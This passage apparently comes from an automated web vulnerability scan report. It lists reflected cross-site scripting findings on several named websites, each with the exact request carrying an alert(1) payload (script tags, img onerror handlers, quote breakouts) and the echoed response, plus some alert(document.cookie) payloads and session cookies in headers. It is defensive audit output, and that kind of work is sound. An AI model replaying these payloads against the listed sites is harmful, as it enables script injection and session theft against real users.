The value of the db request parameter is copied into the HTML document as plain text between tags. The payload bc39f<script>alert(1)</script>6e8f0f5d54e was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/classifieds/classifieds.cgi?db=personalsbc39f<script>alert(1)</script>6e8f0f5d54e HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:43 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 532

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/personalsbc39f<script>alert(1)</script>6e8f0f5d54e.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s
...[SNIP]...

4.23. http://dcregistry.com/cgi-bin/surveys/survey.cgi [db parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The value of the db request parameter is copied into the HTML document as plain text between tags. The payload fe27a<script>alert(1)</script>35aefdde02f was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_lookfe27a<script>alert(1)</script>35aefdde02f&website=&language=&display_poll_results=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:36 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 517

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/db/aad_lookfe27a<script>alert(1)</script>35aefdde02f.db at line 206 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a syntax
...[SNIP]...

4.24. http://dcregistry.com/cgi-bin/surveys/survey.cgi [language parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The value of the language request parameter is copied into the HTML document as plain text between tags. The payload 5027a<script>alert(1)</script>12f2a4bf5c6 was submitted in the language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=&language=5027a<script>alert(1)</script>12f2a4bf5c6&display_poll_results=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:41 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 531

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/language/5027a<script>alert(1)</script>12f2a4bf5c6/template.pl at line 174 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that
...[SNIP]...

4.25. http://dcregistry.com/cgi-bin/surveys/survey.cgi [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The value of the website request parameter is copied into the HTML document as plain text between tags. The payload 39b59<script>alert(1)</script>d0e2bc9f57e was submitted in the website parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=39b59<script>alert(1)</script>d0e2bc9f57e&language=&display_poll_results=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:40 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 515

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/websites/39b59<script>alert(1)</script>d0e2bc9f57e.cfg at line 441 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a synta
...[SNIP]...

4.26. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.csmonitor.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 17c72<script>alert(1)</script>aed7ed93f68 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 220
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:44 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:44 GMT; Path=/
Set-Cookie: di=%7B%7D..1295460044.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 10:54:33 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 18:00:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 18:00:44 GMT
Connection: close

_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68({"urls":["http://segment-pixel.invitemedia.com/pixel?pixelID=38582&partnerID=169&key=segment"],"segments" : ["19F"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

4.27. http://ds.addthis.com/red/psi/sites/www.wileyrein.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wileyrein.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b5131<script>alert(1)</script>ac69988ca2e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.wileyrein.com/p.json?callback=_ate.ad.hprb5131<script>alert(1)</script>ac69988ca2e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.wileyrein.com%2Fjsfe969%252522%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253ec77ca9823dd%2Fui.dialog.js&ref=http%3A%2F%2Fburp%2Fshow%2F5&2lh2lm HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:41 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:41 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 18:00:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 18:00:41 GMT
Connection: close

_ate.ad.hprb5131<script>alert(1)</script>ac69988ca2e({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

4.28. http://financaspessoais.blog.br/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8184"><script>alert(1)</script>c42c81b1212 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8184\"><script>alert(1)</script>c42c81b1212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f8184"><script>alert(1)</script>c42c81b1212=1 HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:16 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?f8184\"><script>alert(1)</script>c42c81b1212=1#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.29. http://financaspessoais.blog.br/ [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff57"><script>alert(1)</script>29569e332da was submitted in the utm_campaign parameter. This input was echoed as aff57\"><script>alert(1)</script>29569e332da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57"><script>alert(1)</script>29569e332da HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:50 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57\"><script>alert(1)</script>29569e332da#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.30. http://financaspessoais.blog.br/ [utm_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259b8"><script>alert(1)</script>8849500d1f1 was submitted in the utm_content parameter. This input was echoed as 259b8\"><script>alert(1)</script>8849500d1f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8\"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.31. http://financaspessoais.blog.br/ [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1033"><script>alert(1)</script>f894aad5354 was submitted in the utm_medium parameter. This input was echoed as e1033\"><script>alert(1)</script>f894aad5354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badgee1033"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:02 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badgee1033\"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.32. http://financaspessoais.blog.br/ [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab23b"><script>alert(1)</script>dbf1985e564 was submitted in the utm_source parameter. This input was echoed as ab23b\"><script>alert(1)</script>dbf1985e564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=bloggerab23b"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:48 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=bloggerab23b\"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.33. http://financaspessoais.blog.br/ [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45a3"><script>alert(1)</script>2751ef5eaae was submitted in the utm_term parameter. This input was echoed as a45a3\"><script>alert(1)</script>2751ef5eaae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3\"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.34. http://flowplayer.org/tools/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372 was submitted in the REST URL parameter 1. This input was echoed as 3018b"><img src=a onerror=alert(1)>23dd898c372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /tools3018b&quot;&gt;&lt;img%20src%3da%20onerror%3dalert(1)&gt;23dd898c372/
Server: nginx/0.7.65
Date: Wed, 19 Jan 2011 15:23:41 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 5920


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="tools3018b"><img src=a onerror=alert(1)>23dd898c372" class="msie tools">
...[SNIP]...

4.35. http://flowplayer.org/tools/expose.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/expose.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5 was submitted in the REST URL parameter 1. This input was echoed as f3bd2"><img src=a onerror=alert(1)>edbe5526fa5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /toolsf3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5/expose.html HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /toolsf3bd2&quot;&gt;&lt;img%20src%3da%20onerror%3dalert(1)&gt;edbe5526fa5/expose.html
Server: nginx/0.7.65
Date: Wed, 19 Jan 2011 15:23:42 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 5835


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="toolsf3bd2"><img src=a onerror=alert(1)>edbe5526fa5_expose" class="msie tools">
...[SNIP]...

4.36. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc5a'-alert(1)-'5b7885e79b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fbc5a'-alert(1)-'5b7885e79b2=1 HTTP/1.1
Host: jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:23:59 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2zpeeq45alawxszruhbhql55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9991
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?fbc5a'-alert(1)-'5b7885e79b2=1';//]]>
...[SNIP]...

4.37. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload a088d<script>alert(1)</script>e11cd877bb9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K08784a088d<script>alert(1)</script>e11cd877bb9&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; 